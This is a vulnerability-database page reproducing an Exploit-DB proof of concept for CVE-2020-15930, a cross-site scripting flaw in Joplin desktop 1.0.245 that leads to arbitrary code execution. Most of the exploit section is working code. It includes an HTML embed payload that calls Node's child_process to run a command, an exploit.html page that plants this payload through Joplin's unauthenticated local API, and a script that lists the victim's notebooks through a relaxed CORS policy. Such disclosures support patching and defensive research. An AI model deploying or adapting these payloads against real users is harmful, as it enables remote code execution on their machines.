Vulners
Lucene search
Joplin 1.0.245 - Arbitrary Code Execution (PoC)
🗓️ 28 Sep 2020 00:00:00Reported by Ademar Nowasky JuniorType 
exploitdb🔗 www.exploit-db.com👁 390 Views
| Reporter | Title | Published | Views | Family All 8 |
|---|---|---|---|---|
 | CVE-2020-15930 | 24 Sep 202018:41 | – | cve |
 | CVE-2020-15930 | 24 Sep 202018:41 | – | cvelist |
 | EUVD-2021-1044 | 7 Oct 202500:30 | – | euvd |
 | Cross-site Scripting in Joplin | 7 May 202116:29 | – | github |
 | CVE-2020-15930 | 24 Sep 202019:15 | – | nvd |
 | GHSA-CGC7-MWP4-3CCX Cross-site Scripting in Joplin | 7 May 202116:29 | – | osv |
 | Joplin 1.0.245 Cross Site Scripting / Code Execution | 28 Sep 202000:00 | – | packetstorm |
 | Cross site scripting | 24 Sep 202019:15 | – | prion |
# Exploit Title: Joplin 1.0.245 - Arbitrary Code Execution (PoC)
# Date: 2020-09-21
# Exploit Author: Ademar Nowasky Junior (@nowaskyjr)
# Vendor Homepage: https://joplinapp.org/
# Software Link: https://github.com/laurent22/joplin/releases/download/v1.0.245/Joplin-Setup-1.0.245.exe
# Version: 1.0.190 to 1.0.245
# Tested on: Windows / Linux
# CVE : CVE-2020-15930
# References:
# https://github.com/laurent22/joplin/commit/57d750bc9aeb0f98d53ed4b924458b54984c15ff
# 1. Technical Details
# An XSS issue in Joplin for desktop v1.0.190 to v1.0.245 allows arbitrary code execution via a malicious HTML embed tag.
# HTML embed tags are not blacklisted in Joplin's renderer. This can be chained with a bug where child windows opened through window.open() have node integration enabled to achieve ACE.
# If Joplin API is enabled, Remote Code Execution with user interaction is possible by abusing the lack of required authentication in Joplin 'POST /notes' api endpoint to remotely deploy the payload into the victim application.
# 2. PoC
# Paste the following payload into a note:
<embed src="data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)</script>">
# 2.1 RCE with user interaction
# Enable Joplin API, visit exploit.html and open the created note in Joplin to execute the exploit.
# By default, notes are stored in the last notebook created.
<!-- exploit.html -->
<script>
x = new XMLHttpRequest;
j = {
title: "CVE-2020-15930",
body: "<embed src='data:text/html,<script>opener?require(`child_process`).exec(`calc`):open(location)<\/script>'>"
};
x.open("POST", "http://127.0.0.1:41184/notes");
x.send(JSON.stringify(j));
</script>
# To create a note in other notebooks you need the notebook ID. It's possible to get the victim's notebooks IDs due to a relaxed CORS policy in 'GET /folders' endpoint.
<!-- notebooks.html -->
<script>
x = new XMLHttpRequest();
x.onreadystatechange = function() {
if (x.readyState == XMLHttpRequest.DONE) {
alert(x.responseText);
}
}
x.open('GET', 'http://127.0.0.1:41184/folders');
x.send();
</script>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Sep 2020 00:00Current
6.5Medium risk
Vulners AI Score6.5
CVSS 24.3
CVSS 3.16.1
EPSS0.0408